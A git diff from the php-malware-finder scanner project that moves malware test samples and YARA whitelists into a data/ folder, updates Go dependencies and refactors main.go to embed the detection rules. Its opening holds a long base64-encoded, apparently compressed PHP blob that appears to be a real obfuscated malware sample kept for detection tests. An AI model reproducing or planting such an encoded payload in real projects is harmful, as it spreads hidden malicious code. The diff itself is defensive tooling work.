-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

-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

+
+#!/usr/bin/php -q
+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
diff --git a/php-malware-finder/samples/real/ice.php b/data/samples/real/ice.php
index 6f8edc0..6f8edc0 100644
--- a/php-malware-finder/samples/real/ice.php
+++ b/data/samples/real/ice.php
diff --git a/php-malware-finder/samples/real/include.php b/data/samples/real/include.php
index 58712f1..58712f1 100644
--- a/php-malware-finder/samples/real/include.php
+++ b/data/samples/real/include.php
diff --git a/php-malware-finder/samples/real/nano.php b/data/samples/real/nano.php
index 14df255..14df255 100644
--- a/php-malware-finder/samples/real/nano.php
+++ b/data/samples/real/nano.php
diff --git a/php-malware-finder/samples/real/ninja.php b/data/samples/real/ninja.php
index fdace58..fdace58 100644
--- a/php-malware-finder/samples/real/ninja.php
+++ b/data/samples/real/ninja.php
diff --git a/php-malware-finder/samples/real/novahot.php b/data/samples/real/novahot.php
index a330580..a330580 100644
--- a/php-malware-finder/samples/real/novahot.php
+++ b/data/samples/real/novahot.php
diff --git a/php-malware-finder/samples/real/srt.php b/data/samples/real/srt.php
index ef02af2..ef02af2 100644
--- a/php-malware-finder/samples/real/srt.php
+++ b/data/samples/real/srt.php
diff --git a/php-malware-finder/samples/real/sucuri_2014_04.php b/data/samples/real/sucuri_2014_04.php
index 64bfa07..64bfa07 100644
--- a/php-malware-finder/samples/real/sucuri_2014_04.php
+++ b/data/samples/real/sucuri_2014_04.php
diff --git a/php-malware-finder/samples/undetected/smart.php b/data/samples/undetected/smart.php
index f358562..f358562 100644
--- a/php-malware-finder/samples/undetected/smart.php
+++ b/data/samples/undetected/smart.php
diff --git a/php-malware-finder/whitelist.yar b/data/whitelist.yar
index 3cb42b4..3cb42b4 100644
--- a/php-malware-finder/whitelist.yar
+++ b/data/whitelist.yar
diff --git a/php-malware-finder/whitelists/custom.yar b/data/whitelists/custom.yar
index 594d25b..594d25b 100644
--- a/php-malware-finder/whitelists/custom.yar
+++ b/data/whitelists/custom.yar
diff --git a/php-malware-finder/whitelists/drupal.yar b/data/whitelists/drupal.yar
index 3766698..3766698 100644
--- a/php-malware-finder/whitelists/drupal.yar
+++ b/data/whitelists/drupal.yar
diff --git a/php-malware-finder/whitelists/magento1ce.yar b/data/whitelists/magento1ce.yar
index 9182ccb..9182ccb 100644
--- a/php-malware-finder/whitelists/magento1ce.yar
+++ b/data/whitelists/magento1ce.yar
diff --git a/php-malware-finder/whitelists/magento2.yar b/data/whitelists/magento2.yar
index c942fae..c942fae 100644
--- a/php-malware-finder/whitelists/magento2.yar
+++ b/data/whitelists/magento2.yar
diff --git a/php-malware-finder/whitelists/phpmyadmin.yar b/data/whitelists/phpmyadmin.yar
index b0fc167..b0fc167 100644
--- a/php-malware-finder/whitelists/phpmyadmin.yar
+++ b/data/whitelists/phpmyadmin.yar
diff --git a/php-malware-finder/whitelists/prestashop.yar b/data/whitelists/prestashop.yar
index 2f67825..2f67825 100644
--- a/php-malware-finder/whitelists/prestashop.yar
+++ b/data/whitelists/prestashop.yar
diff --git a/php-malware-finder/whitelists/symfony.yar b/data/whitelists/symfony.yar
index 8c757e1..8c757e1 100644
--- a/php-malware-finder/whitelists/symfony.yar
+++ b/data/whitelists/symfony.yar
diff --git a/php-malware-finder/whitelists/wordpress.yar b/data/whitelists/wordpress.yar
index 78db3c9..78db3c9 100644
--- a/php-malware-finder/whitelists/wordpress.yar
+++ b/data/whitelists/wordpress.yar
diff --git a/go.mod b/go.mod
index 39b2f36..f7119bc 100644
--- a/go.mod
+++ b/go.mod
@@ -1,10 +1,10 @@
 module github.com/jvoisin/php-malware-finder
 
-go 1.17
+go 1.16
 
 require (
-        github.com/hillu/go-yara/v4 v4.2.0
+        github.com/hillu/go-yara/v4 v4.2.1
         github.com/jessevdk/go-flags v1.5.0
 )
 
-require golang.org/x/sys v0.0.0-20220310020820-b874c991c1a5 // indirect
+require golang.org/x/sys v0.0.0-20220412211240-33da011f77ad // indirect
diff --git a/go.sum b/go.sum
index aa0af83..f47d367 100644
--- a/go.sum
+++ b/go.sum
@@ -1,7 +1,7 @@
-github.com/hillu/go-yara/v4 v4.2.0 h1:C0YycpDYXMlOsN4kbFhvGmfNiaTgpXoLQRS1oUME9ak=
-github.com/hillu/go-yara/v4 v4.2.0/go.mod h1:rkb/gSAoO8qcmj+pv6fDZN4tOa3N7R+qqGlEkzT4iys=
+github.com/hillu/go-yara/v4 v4.2.1 h1:SwPQpM5BixBYoJKaDArsKTW3zFEWSTFdICl5ORC0JCI=
+github.com/hillu/go-yara/v4 v4.2.1/go.mod h1:AHEs/FXVMQKVVlT6iG9d+q1BRr0gq0WoAWZQaZ0gS7s=
 github.com/jessevdk/go-flags v1.5.0 h1:1jKYvbxEjfUl0fmqTCOfonvskHHXMjBySTLW4y9LFvc=
 github.com/jessevdk/go-flags v1.5.0/go.mod h1:Fw0T6WPc1dYxT4mKEZRfG5kJhaTDP9pj1c2EWnYs/m4=
 golang.org/x/sys v0.0.0-20210320140829-1e4c9ba3b0c4/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
-golang.org/x/sys v0.0.0-20220310020820-b874c991c1a5 h1:y/woIyUBFbpQGKS0u1aHF/40WUDnek3fPOyD08H5Vng=
-golang.org/x/sys v0.0.0-20220310020820-b874c991c1a5/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
+golang.org/x/sys v0.0.0-20220412211240-33da011f77ad h1:ntjMns5wyP/fN65tdBD4g8J5w8n015+iIIs9rtjXkY0=
+golang.org/x/sys v0.0.0-20220412211240-33da011f77ad/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
diff --git a/php-malware-finder/phpmalwarefinder.go b/main.go
index 2a641b3..d5f8d69 100644
--- a/php-malware-finder/phpmalwarefinder.go
+++ b/main.go
@@ -2,8 +2,10 @@ package main
 
 import (
         "bytes"
+        "embed"
         "fmt"
         "io"
+        "io/fs"
         "io/ioutil"
         "log"
         "net/http"
@@ -17,89 +19,135 @@ import (
         "github.com/jessevdk/go-flags"
 )
 
-const RulesURI = "https://raw.githubusercontent.com/jvoisin/php-malware-finder/master/php-malware-finder/"
-const RulesFile = "php.yar"
-const DefaultDir = "/etc/phpmalwarefinder"
-const ScanMaxDuration = time.Duration(60)
-const TooShort = "TooShort"
-const TooShortMaxLines = 2
-const TooShortMinChars = 300
-const DangerousMatchWeight = 2
-const DangerousMinScore = 3
-const FileBufferSize = 32 * 1024 // 32KB
-const YaraMaxThreads = 32
+const (
+        RulesURI             = "https://raw.githubusercontent.com/jvoisin/php-malware-finder/master/php-malware-finder/data"
+        RulesFile            = "php.yar"
+        ScanMaxDuration      = time.Duration(60)
+        TooShort             = "TooShort"
+        TooShortMaxLines     = 2
+        TooShortMinChars     = 300
+        DangerousMatchWeight = 2
+        DangerousMinScore    = 3
+        FileBufferSize       = 32 * 1024 // 32KB
+        YaraMaxThreads       = 32
+        TempDirPrefix        = "pmf-"
+)
 
-var args struct { // command-line arguments specs using github.com/jessevdk/go-flags
-        RulesDir      string   `short:"r" long:"rules-dir" description:"Rules location (default: /etc/phpmalwarefinder or .)"`
-        ShowAll       bool     `short:"a" long:"show-all" description:"Display all matched rules"`
-        Fast          bool     `short:"f" long:"fast" description:"Enable YARA's fast mode"`
-        RateLimit     int      `short:"R" long:"rate-limit" description:"Max. filesystem ops per second, 0 for no limit" default:"0"`
-        Verbose       bool     `short:"v" long:"verbose" description:"Verbose mode"`
-        Workers       int      `short:"w" long:"workers" description:"Number of workers to spawn for scanning" default:"32"`
-        LongLines     bool     `short:"L" long:"long-lines" description:"Check long lines"`
-        ExcludeCommon bool     `short:"c" long:"exclude-common" description:"Do not scan files with common extensions"`
-        ExcludeImgs   bool     `short:"i" long:"exclude-imgs" description:"Do not scan image files"`
-        ExcludedExts  []string `short:"x" long:"exclude-ext" description:"Additional file extensions to exclude"`
-        Update        bool     `short:"u" long:"update" description:"Update rules"`
-        Positional    struct {
-                Target string
-        } `positional-args:"yes"`
-}
-var scanFlags yara.ScanFlags
-var stoppedWorkers int
-var lineFeed = []byte{'\n'}
-var dangerousMatches = map[string]struct{}{
-        "PasswordProtection": {},
-        "Websites":           {},
-        "TooShort":           {},
-        "NonPrintableChars":  {},
-}
-var excludedDirs = [...]string{
-        "/.git/", "/.hg/", "/.svn/", "/.CVS/",
-}
-var excludedExts = map[string]struct{}{}
-var commonExts = [...]string{
-        ".js", ".coffee", ".map", ".min", ".css", ".less", // static files
-        ".zip", ".rar", ".7z", ".gz", ".bz2", ".xz", ".tar", ".tgz", // archives
-        ".txt", ".csv", ".json", ".rst", ".md", ".yaml", ".yml", // plain text
-        ".so", ".dll", ".bin", ".exe", ".bundle", // binaries
-}
-var imageExts = [...]string{
-        ".png", ".jpg", ".jpeg", ".gif", ".svg", ".bmp", ".ico",
-}
-var scannedFilesCount int
+var (
+        args struct { // command-line arguments specs using github.com/jessevdk/go-flags
+                RulesDir      string   `short:"r" long:"rules-dir" description:"Alternative rules location (default: embedded rules)"`
+                ShowAll       bool     `short:"a" long:"show-all" description:"Display all matched rules"`
+                Fast          bool     `short:"f" long:"fast" description:"Enable YARA's fast mode"`
+                RateLimit     int      `short:"R" long:"rate-limit" description:"Max. filesystem ops per second, 0 for no limit" default:"0"`
+                Verbose       bool     `short:"v" long:"verbose" description:"Verbose mode"`
+                Workers       int      `short:"w" long:"workers" description:"Number of workers to spawn for scanning" default:"32"`
+                LongLines     bool     `short:"L" long:"long-lines" description:"Check long lines"`
+                ExcludeCommon bool     `short:"c" long:"exclude-common" description:"Do not scan files with common extensions"`
+                ExcludeImgs   bool     `short:"i" long:"exclude-imgs" description:"Do not scan image files"`
+                ExcludedExts  []string `short:"x" long:"exclude-ext" description:"Additional file extensions to exclude"`
+                Update        bool     `short:"u" long:"update" description:"Update rules"`
+                ShowVersion   bool     `short:"V" long:"version" description:"Show version number and exit"`
+                Positional    struct {
+                        Target string
+                } `positional-args:"yes"`
+        }
+        scanFlags        yara.ScanFlags
+        stoppedWorkers   int
+        lineFeed         = []byte{'\n'}
+        dangerousMatches = map[string]struct{}{
+                "PasswordProtection": {},
+                "Websites":           {},
+                "TooShort":           {},
+                "NonPrintableChars":  {},
+        }
+        excludedDirs = [...]string{
+                "/.git/", "/.hg/", "/.svn/", "/.CVS/",
+        }
+        excludedExts = map[string]struct{}{}
+        commonExts   = [...]string{
+                ".js", ".coffee", ".map", ".min", ".css", ".less", // static files
+                ".zip", ".rar", ".7z", ".gz", ".bz2", ".xz", ".tar", ".tgz", // archives
+                ".txt", ".csv", ".json", ".rst", ".md", ".yaml", ".yml", // plain text
+                ".so", ".dll", ".bin", ".exe", ".bundle", // binaries
+        }
+        imageExts = [...]string{
+                ".png", ".jpg", ".jpeg", ".gif", ".svg", ".bmp", ".ico",
+        }
+        scannedFilesCount int
+        rulesFiles        = [...]string{
+                RulesFile, "whitelist.yar",
+                "whitelists/custom.yar", "whitelists/drupal.yar", "whitelists/magento1ce.yar", "whitelists/magento2.yar",
+                "whitelists/phpmyadmin.yar", "whitelists/prestashop.yar", "whitelists/symfony.yar", "whitelists/wordpress.yar",
+        }
+        tempDirPathPrefix = path.Join(os.TempDir(), TempDirPrefix)
+        version           = "dev"
+
+        //go:embed data/php.yar data/whitelist.yar data/whitelists
+        data embed.FS
+)
 
-// handleError is a generic error handler which displays the error message to the user and exits if required.
-func handleError(err error, exit bool) {
+// handleError is a generic error handler which displays an error message to the user and exits if required.
+func handleError(err error, desc string, isFatal bool) {
         if err != nil {
-                log.Println("[ERROR]", err)
-                if exit {
+                if desc != "" {
+                        desc = " " + desc + ":"
+                }
+                log.Println("[ERROR]"+desc, err)
+                if isFatal {
                         os.Exit(1)
                 }
         }
 }
 
+// writeRulesFiles copies the rules from the content of a `fs.FS` to a temporary folder and
+// returns its location.
+func writeRulesFiles(content fs.FS) string {
+        // create temporary folder structure
+        rulesPath, err := ioutil.TempDir(os.TempDir(), TempDirPrefix)
+        handleError(err, "unable to create temporary folder", true)
+        err = os.Mkdir(path.Join(rulesPath, "whitelists"), 0755)
+        handleError(err, "unable to create temporary subfolder", true)
+
+        // write each YARA file to the disk
+        for _, rulesFile := range rulesFiles {
+                // read embedded content
+                f, err := content.Open(path.Join("data", rulesFile))
+                handleError(err, "unable to read embedded rule", true)
+                ruleData, err := ioutil.ReadAll(f)
+
+                // write to temporary file
+                err = os.WriteFile(path.Join(rulesPath, rulesFile), ruleData, 0640)
+                handleError(err, "unable to write rule to disk", true)
+                err = f.Close()
+                handleError(err, "unable to close rules file", false)
+        }
+        return rulesPath
+}
+
 // updateRules downloads latest YARA rules from phpmalwarefinder GitHub repository.
 // Download location is either `args.RulesDir`, `/etc/phpmalwarefinder`, or the current directory.
 func updateRules() {
+        if strings.HasPrefix(args.RulesDir, tempDirPathPrefix) {
+                handleError(fmt.Errorf("rules folder must be specified to update"), "", true)
+        }
         if args.Verbose {
                 log.Println("[DEBUG] updating ruleset")
         }
 
         downloadFile := func(uri string) []byte {
                 resp, err := http.Get(uri)
-                handleError(err, true)
+                handleError(err, "unable to download rule", true)
                 defer func() {
                         err := resp.Body.Close()
-                        handleError(err, false)
+                        handleError(err, "unable to close response body", false)
                 }()
                 data, err := ioutil.ReadAll(resp.Body)
-                handleError(err, true)
+                handleError(err, "unable to read response body", false)
                 return data
         }
         writeFile := func(dst string, data []byte) {
-                err := ioutil.WriteFile(dst, data, 0440)
-                handleError(err, true)
+                err := ioutil.WriteFile(dst, data, 0640)
+                handleError(err, "unable to write downloaded file", true)
         }
 
         rulesFiles := [...]string{
@@ -122,10 +170,12 @@ func updateRules() {
 // File reading is done using a 32KB buffer to minimize memory usage.
 func fileStats(filepath string) (int, int, error) {
         f, err := os.Open(filepath)
-        handleError(err, true)
+        if err != nil {
+                return 0, 0, err
+        }
         defer func() {
                 err := f.Close()
-                handleError(err, false)
+                handleError(err, "unable to close file", false)
         }()
         charCount, lineCount := 0, 0
         buf := make([]byte, FileBufferSize)
@@ -145,7 +195,7 @@ func fileStats(filepath string) (int, int, error) {
 // makeScanner creates a YARA scanner with the appropriate options set.
 func makeScanner(rules *yara.Rules) *yara.Scanner {
         scanner, err := yara.NewScanner(rules)
-        handleError(err, true)
+        handleError(err, "unable to create YARA scanner", true)
         scanner.SetFlags(scanFlags)
         scanner.SetTimeout(ScanMaxDuration)
         return scanner
@@ -163,7 +213,7 @@ func processFiles(rules *yara.Rules, targets <-chan string, results chan<- map[s
 
                 if args.LongLines {
                         charCount, lineCount, err := fileStats(target)
-                        handleError(err, false)
+                        handleError(err, "unable to get file stats", false)
                         if lineCount <= TooShortMaxLines && charCount >= TooShortMinChars {
                                 tooShort := yara.MatchRule{Rule: TooShort}
                                 result[target] = append(result[target], tooShort)
@@ -206,7 +256,7 @@ func scanDir(dirName string, targets chan<- string, ticker <-chan time.Time) {
